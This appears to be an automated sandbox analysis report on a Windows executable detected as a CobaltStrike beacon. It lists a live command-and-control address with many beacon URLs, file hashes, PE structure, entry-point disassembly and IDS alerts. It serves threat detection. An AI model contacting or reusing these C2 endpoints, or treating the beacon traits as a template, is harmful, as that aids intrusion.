            System Owner/User Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
            File and Directory Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow4
            System Information Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            P3KxDOMmD3.exe87%ReversingLabsWin64.Backdoor.CobaltStrike
            P3KxDOMmD3.exe100%AviraHEUR/AGEN.1344321
            P3KxDOMmD3.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            No contacted domains info
            NameMaliciousAntivirus DetectionReputation
            http://89.197.154.116:7810/cmtrue
              unknown
              89.197.154.116true
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://89.197.154.116:7810/cmZP3KxDOMmD3.exe, 00000000.00000003.1786743074.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1769347284.0000000000771000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  http://89.197.154.116:7810/cmujP3KxDOMmD3.exe, 00000000.00000003.3720845976.000000000076F000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    http://89.197.154.116:7810/cmVP3KxDOMmD3.exe, 00000000.00000003.1804978750.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1926499944.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1786743074.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1769347284.0000000000771000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1822139187.000000000076F000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      http://89.197.154.116:7810/cmXP3KxDOMmD3.exe, 00000000.00000003.1944131146.000000000076F000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        http://89.197.154.116:7810/cmNP3KxDOMmD3.exe, 00000000.00000003.3498905059.000000000076F000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://89.197.154.116:7810/cmPP3KxDOMmD3.exe, 00000000.00000003.2021917325.0000000000771000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.2002206918.0000000000771000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            http://89.197.154.116:7810/cmk.3vP3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000074C000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://89.197.154.116:7810/cmDP3KxDOMmD3.exe, 00000000.00000003.2021917325.0000000000771000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.2002206918.0000000000771000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://89.197.154.116:7810/cm54.116:7810/cmP3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000074C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://89.197.154.116:7810/cmyP3KxDOMmD3.exe, 00000000.00000003.1856658291.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1892519888.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1839492147.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1873621134.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1822139187.000000000076F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://89.197.154.116:7810/cm.dP3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000074C000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      http://89.197.154.116:7810/cmuP3KxDOMmD3.exe, 00000000.00000003.1804978750.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1856658291.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1839492147.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1822139187.000000000076F000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://89.197.154.116:7810/cmxP3KxDOMmD3.exe, 00000000.00000003.1804978750.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.3194894612.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000076F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://89.197.154.116:7810/cmqP3KxDOMmD3.exe, 00000000.00000003.2876116472.000000000076F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://89.197.154.116:7810/cmrP3KxDOMmD3.exe, 00000000.00000003.1944131146.000000000076F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              http://89.197.154.116:7810/cmxuP3KxDOMmD3.exe, 00000000.00000003.2620871241.000000000076F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                http://89.197.154.116:7810/cmpP3KxDOMmD3.exe, 00000000.00000003.1856658291.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.2638951717.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.2492373736.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.4084894276.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1873621134.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000076F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://89.197.154.116:7810/cm54.116:7810/cmayP3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000074C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://89.197.154.116:7810/cmjP3KxDOMmD3.exe, 00000000.00000003.1769347284.0000000000771000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://89.197.154.116:7810/cmhP3KxDOMmD3.exe, 00000000.00000003.3194894612.000000000076F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://89.197.154.116:7810/cmVAP3KxDOMmD3.exe, 00000000.00000003.2603494375.000000000076F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://127.0.0.1:%u/P3KxDOMmD3.exe, 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://89.197.154.116:7810/cmcP3KxDOMmD3.exe, 00000000.00000003.1786743074.000000000076F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://89.197.154.116:7810/cmk.pyP3KxDOMmD3.exe, 00000000.00000002.4153529711.000000000074C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                89.197.154.116
                                                                unknownUnited Kingdom
                                                                47474VIRTUAL1GBtrue
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1528400
                                                                Start date and time:2024-10-07 21:59:08 +02:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 6m 59s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:5
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Sample name:P3KxDOMmD3.exe
                                                                renamed because original name is a hash value
                                                                Original Sample Name:b079e06ca60cf07b35abd19e225d3e1c.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                                                EGA Information:
                                                                • Successful, ratio: 100%
                                                                HCA Information:
                                                                • Successful, ratio: 100%
                                                                • Number of executed functions: 15
                                                                • Number of non-executed functions: 165
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                • VT rate limit hit for: P3KxDOMmD3.exe
                                                                TimeTypeDescription
                                                                16:00:01API Interceptor15363399x Sleep call for process: P3KxDOMmD3.exe modified
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                89.197.154.116file.exeGet hashmaliciousCobaltStrikeBrowse
                                                                • 89.197.154.116:7810/push
                                                                file.exeGet hashmaliciousCobaltStrikeBrowse
                                                                • 89.197.154.116:7810/load
                                                                file.exeGet hashmaliciousCobaltStrikeBrowse
                                                                • 89.197.154.116:7810/ptj
                                                                file.exeGet hashmaliciousCobaltStrikeBrowse
                                                                • 89.197.154.116:7810/IE9CompatViewList.xml
                                                                file.exeGet hashmaliciousCobaltStrikeBrowse
                                                                • 89.197.154.116:7810/pixel
                                                                ZnbEj6OQ7e.exeGet hashmaliciousCobaltStrikeBrowse
                                                                • 89.197.154.116:7810/pixel
                                                                YpJ4EZPgHX.exeGet hashmaliciousCobaltStrikeBrowse
                                                                • 89.197.154.116:7810/dpixel
                                                                FKfLumFBx9.exeGet hashmaliciousUnknownBrowse
                                                                • 89.197.154.116:7810/O6Z_Oh2DCu_X-db4sYLFEg1hYXRf_R2oUsq-2FBCe7OY5fyzWx30F0mf2_tTjbnFbloJRApsw
                                                                knuBp1Y6Rl.dllGet hashmaliciousUnknownBrowse
                                                                • 89.197.154.116:7810/r0YP8_HZj6Xh9eD0h471LAg3P8LpTQjBwuoVU2_qOmLbrRhD7dzVzwh4X1zqWkGpdfKoeGcDyWqM5Vj7W_USDDh
                                                                15xc2BVlS0.exeGet hashmaliciousCobaltStrikeBrowse
                                                                • 89.197.154.116:7810/ga.js
                                                                No context
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                VIRTUAL1GBlNymIO2RVq.vbsGet hashmaliciousMetasploitBrowse
                                                                • 89.197.154.116
                                                                DRVf7H9j4V.exeGet hashmaliciousMetasploitBrowse
                                                                • 89.197.154.115
                                                                Xwl3DsNmN2.exeGet hashmaliciousCobaltStrike, Metasploit, ReflectiveLoaderBrowse
                                                                • 89.197.154.115
                                                                Windows11.exeGet hashmaliciousMetasploitBrowse
                                                                • 193.117.208.101
                                                                Trial.batGet hashmaliciousEmpireBrowse
                                                                • 193.117.208.101
                                                                Ti1p9tvbSW.exeGet hashmaliciousMetasploitBrowse
                                                                • 89.197.154.116
                                                                NUBuymtQ4b.exeGet hashmaliciousMetasploitBrowse
                                                                • 89.197.154.116
                                                                ealpZ0zoQi.exeGet hashmaliciousMetasploitBrowse
                                                                • 89.197.154.116
                                                                pA826G7Zi6.exeGet hashmaliciousMetasploitBrowse
                                                                • 89.197.154.116
                                                                SecuriteInfo.com.Linux.Siggen.9999.18891.22819.elfGet hashmaliciousUnknownBrowse
                                                                • 89.197.225.199
                                                                No context
                                                                No context
                                                                No created / dropped files found
                                                                File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                Entropy (8bit):7.186234474904441
                                                                TrID:
                                                                • Win64 Executable (generic) (12005/4) 74.80%
                                                                • Generic Win/DOS Executable (2004/3) 12.49%
                                                                • DOS Executable Generic (2002/1) 12.47%
                                                                • VXD Driver (31/22) 0.19%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                                File name:P3KxDOMmD3.exe
                                                                File size:328'704 bytes
                                                                MD5:b079e06ca60cf07b35abd19e225d3e1c
                                                                SHA1:9f707057f162e7b6b6a51fd0b8ad1f155ae6438b
                                                                SHA256:a430979a8135771d0a0ffce9ef6755052ae788dec08e9a095d5e63f9b6f387f6
                                                                SHA512:9e9f2b96d1b524e8945559f9e0982c60a6e5a2bd21493f0e9eae6b241750473d105316ed1a16c1e04b0a64af7e7548ed75374d8947e73aaada72d8365c799ffe
                                                                SSDEEP:6144:eURR/+NIoAAM7LSae3Nw8ltR8ZllIhfSjJE/1Foa+nl:eUzXledw4RoSh3XoPn
                                                                TLSH:5364AE7DEBB357CAD22187FD81AC5049389B3A638EF3BC31D11427960A22A94D5E3D74
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...."."....................@..............................p......cu........ ............................
                                                                Icon Hash:90cececece8e8eb0
                                                                Entrypoint:0x4014c0
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                                DLL Characteristics:
                                                                Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                TLS Callbacks:0x401ba0
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:147442e63270e287ed57d33257638324
                                                                Instruction
                                                                dec eax
                                                                sub esp, 28h
                                                                dec eax
                                                                mov eax, dword ptr [0004EFF5h]
                                                                mov dword ptr [eax], 00000001h
                                                                call 00007F68FC80F32Fh
                                                                call 00007F68FC80EB1Ah
                                                                nop
                                                                nop
                                                                dec eax
                                                                add esp, 28h
                                                                ret
                                                                nop word ptr [eax+eax+00000000h]
                                                                nop dword ptr [eax]
                                                                dec eax
                                                                sub esp, 28h
                                                                dec eax
                                                                mov eax, dword ptr [0004EFC5h]
                                                                mov dword ptr [eax], 00000000h
                                                                call 00007F68FC80F2FFh
                                                                call 00007F68FC80EAEAh
                                                                nop
                                                                nop
                                                                dec eax
                                                                add esp, 28h
                                                                ret
                                                                nop word ptr [eax+eax+00000000h]
                                                                nop dword ptr [eax]
                                                                dec eax
                                                                sub esp, 28h
                                                                call 00007F68FC8107C4h
                                                                dec eax
                                                                test eax, eax
                                                                sete al
                                                                movzx eax, al
                                                                neg eax
                                                                dec eax
                                                                add esp, 28h
                                                                ret
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                dec eax
                                                                lea ecx, dword ptr [00000009h]
                                                                jmp 00007F68FC80EE49h
                                                                nop dword ptr [eax+00h]
                                                                ret
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                dec eax
                                                                jmp ecx
                                                                dec eax
                                                                arpl word ptr [00002AC2h], ax
                                                                test eax, eax
                                                                jle 00007F68FC80EE98h
                                                                cmp dword ptr [00002ABBh], 00000000h
                                                                jle 00007F68FC80EE8Fh
                                                                dec eax
                                                                mov edx, dword ptr [00052CFEh]
                                                                dec eax
                                                                mov dword ptr [ecx+eax], edx
                                                                dec eax
                                                                mov edx, dword ptr [00052CFBh]
                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x540000x8d8.idata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x510000x2b8.pdata
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x500600x28.rdata
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x542240x1e8.idata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x20a80x2200ba98beafce4128c14539a20f3e854b25False0.5734145220588235data6.010394259460846IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .data0x40000x4bcf00x4be00673fdc6b06fa0240286975d8efffe40bFalse0.6211774093904449dBase III DBT, version number 0, next free block index 10, 1st item "BGJ>BGJ>BGJ>B\254I>2GJ>BGJ>BGJ>BgI>2AJ>BGJ>BGJ>BGJ>BGJ>BGJ>BGJ>l3/F6GJ>\300FI>BWJ>BEI>BCJ>BGJ>BGJ>BGJ>bGJ^l5._6&J>@\273J>BgI>B\271J>BAI>BGJ"7.182180143480097IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rdata0x500000x9100xa005fcc7830b4dcd602b35eeb7f1712e8faFalse0.241796875data4.459688665734325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                                .pdata0x510000x2b80x400f88aef14dea168f37249daf0dce04c78False0.37890625data3.2311971178670404IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                                .xdata0x520000x2380x4006ce9e303fb86766d702ecb2b174cf348False0.2578125data2.6337753778508075IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                                .bss0x530000x9d00x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .idata0x540000x8d80xa003aae8d98b4d34bad008e73a14573bffdFalse0.323828125data3.966749721413537IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .CRT0x550000x680x20052d79e9aecf5d5c3145d3ec54aa197a8False0.0703125data0.2709192282599745IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .tls0x560000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                DLLImport
                                                                KERNEL32.dllCloseHandle, ConnectNamedPipe, CreateFileA, CreateNamedPipeA, CreateThread, DeleteCriticalSection, EnterCriticalSection, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetLastError, GetModuleHandleA, GetProcAddress, GetStartupInfoA, GetSystemTimeAsFileTime, GetTickCount, InitializeCriticalSection, LeaveCriticalSection, QueryPerformanceCounter, ReadFile, RtlAddFunctionTable, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsGetValue, UnhandledExceptionFilter, VirtualAlloc, VirtualProtect, VirtualQuery, WriteFile
                                                                msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _fmode, _initterm, _onexit, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, signal, sprintf, strlen, strncmp, vfprintf
                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-10-07T22:00:04.887327+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44973089.197.154.1167810TCP
                                                                2024-10-07T22:00:04.887327+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44973089.197.154.1167810TCP
                                                                2024-10-07T22:00:06.825937+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44973189.197.154.1167810TCP
                                                                2024-10-07T22:00:06.825937+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44973189.197.154.1167810TCP
                                                                2024-10-07T22:00:08.534715+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44973289.197.154.1167810TCP
                                                                2024-10-07T22:00:08.534715+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44973289.197.154.1167810TCP
                                                                2024-10-07T22:00:10.264513+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44973389.197.154.1167810TCP
                                                                2024-10-07T22:00:10.264513+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44973389.197.154.1167810TCP
                                                                2024-10-07T22:00:12.028170+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44973489.197.154.1167810TCP
                                                                2024-10-07T22:00:12.028170+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44973489.197.154.1167810TCP
                                                                2024-10-07T22:00:13.851716+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44973589.197.154.1167810TCP
                                                                2024-10-07T22:00:13.851716+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44973589.197.154.1167810TCP
                                                                2024-10-07T22:00:15.567674+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44973689.197.154.1167810TCP
                                                                2024-10-07T22:00:15.567674+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44973689.197.154.1167810TCP
                                                                2024-10-07T22:00:17.303031+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44973789.197.154.1167810TCP
                                                                2024-10-07T22:00:17.303031+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44973789.197.154.1167810TCP
                                                                2024-10-07T22:00:19.019522+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44973889.197.154.1167810TCP
                                                                2024-10-07T22:00:19.019522+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44973889.197.154.1167810TCP
                                                                2024-10-07T22:00:20.715916+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44974189.197.154.1167810TCP
                                                                2024-10-07T22:00:20.715916+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44974189.197.154.1167810TCP
                                                                2024-10-07T22:00:22.559096+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44974589.197.154.1167810TCP
                                                                2024-10-07T22:00:22.559096+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44974589.197.154.1167810TCP
                                                                2024-10-07T22:00:24.295931+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44974789.197.154.1167810TCP
                                                                2024-10-07T22:00:24.295931+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44974789.197.154.1167810TCP
                                                                2024-10-07T22:00:26.003982+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44974889.197.154.1167810TCP
                                                                2024-10-07T22:00:26.003982+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44974889.197.154.1167810TCP
                                                                2024-10-07T22:00:27.767095+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44974989.197.154.1167810TCP
